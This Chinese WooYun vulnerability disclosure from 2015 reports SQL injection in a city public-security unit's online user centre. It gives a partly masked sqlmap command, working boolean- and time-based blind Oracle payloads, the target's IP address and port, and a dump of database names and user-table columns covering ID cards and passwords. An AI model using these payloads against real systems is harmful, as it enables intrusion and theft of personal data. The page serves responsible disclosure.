当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0102825

漏洞标题:某市敏感单位网上XX用户中心存在注入导致用户信息泄漏

相关厂商:某市敏感单位

漏洞作者: 啊L川

提交时间:2015-03-24 14:17

修复时间:2015-05-11 08:34

公开时间:2015-05-11 08:34

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(公安部一所)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-24: 细节已通知厂商并且等待厂商处理中
2015-03-27: 厂商已经确认,细节仅向厂商公开
2015-04-06: 细节向核心白帽子及相关领域专家公开
2015-04-16: 细节向普通白帽子公开
2015-04-26: 细节向实习白帽子公开
2015-05-11: 细节向公众公开

简要描述:

xx部研究所是全国xx和社会公共安全防范部门的技术支持单位,经过反复沟通大家认可乌云的价值并且尊重乌云的立场,之前有重要xx漏洞没有得到及时处理的小伙伴可以再次尝试提交了,另外公共安全系统漏洞对社会、民生等会造成重大威胁,所以还望各位的提交过程中细心谨慎对待,切勿对系统造成不良影响,多乌云 多机会

详细说明:

mask 区域
*****1
*****
*****心登^*****
*****;cod*****
1.http://**.**.**/eedswas/www/eeds/jsp/user_center/user_center.jspsystem=0FCAF188F5A32098FADFF5B5ACA1CB8E_
2.://**.**.**//58.18.251.10:9003/eedswas/www/eeds/jsp/user_center/mine_info/base_info.jspsystem=88001_
*****de&g*****
*****^在sql^*****
*****code*****
3.://**.**.**//58.18.251.10:9003/eedswas/ptluser.action" --data="fn=login&type=1&loginname=admin*&pwd=123455" --dbs --thread 10_
*****code*****

漏洞证明:

Parameter: #1* ((custom) POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: fn=login&type=1&loginname=admin' AND 3358=3358 AND 'RoFv'='RoFv&pwd=123455
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: fn=login&type=1&loginname=admin' AND 9704=DBMS_PIPE.RECEIVE_MESSAGE(CHR(110)||CHR(111)||CHR(116)||CHR(114),5) AND 'sizG'='sizG&pwd=123455
---
back-end DBMS: Oracle
available databases [23]:
[*] CMS
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EEDSUCAP
[*] EEDSWAS
[*] EXFSYS
[*] HR
[*] IX
[*] MDSYS
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] SCOTT
[*] SH
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB
Database: EEDSWAS
Table: PTL_USER
[29 columns]
+---------------+----------+
| Column | Type |
+---------------+----------+
| ADDR | VARCHAR2 |
| ANSWER | VARCHAR2 |
| BELONGTO | VARCHAR2 |
| BINDPHONE | VARCHAR2 |
| BINDTIME | DATE |
| CITYPROPER | VARCHAR2 |
| EMAIL | VARCHAR2 |
| IDCARD | VARCHAR2 |
| IDCARDADDR | VARCHAR2 |
| IDCARDTYPE | VARCHAR2 |
| INTRODUC | VARCHAR2 |
| ISWXUSER | VARCHAR2 |
| LOGINNAME | VARCHAR2 |
| MOBLIE | VARCHAR2 |
| NAME | VARCHAR2 |
| NICKNAME | VARCHAR2 |
| OPENID | VARCHAR2 |
| ORGANCODE | VARCHAR2 |
| PHONE | VARCHAR2 |
| POLICESTATION | VARCHAR2 |
| POSTCODE | VARCHAR2 |
| PWD | VARCHAR2 |
| QUESTION | VARCHAR2 |
| SEX | VARCHAR2 |
| STATUS | VARCHAR2 |
| UNID | VARCHAR2 |
| UNITNAME | VARCHAR2 |
| USERTYPE | VARCHAR2 |
| WXUSERNAME | VARCHAR2 |


mask 区域
1.://**.**.**//58.18.251.10:9003/eedswas/www/eeds/jsp/left/qi_flash.jsp


QQ20150321-1@2x.png


修复方案:

测试数据已删除!!!

版权声明:转载请注明来源 啊L川@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-03-27 08:32

厂商回复:

验证确认所描述的问题,已通知其修复。

最新状态:

暂无


漏洞评价:

评论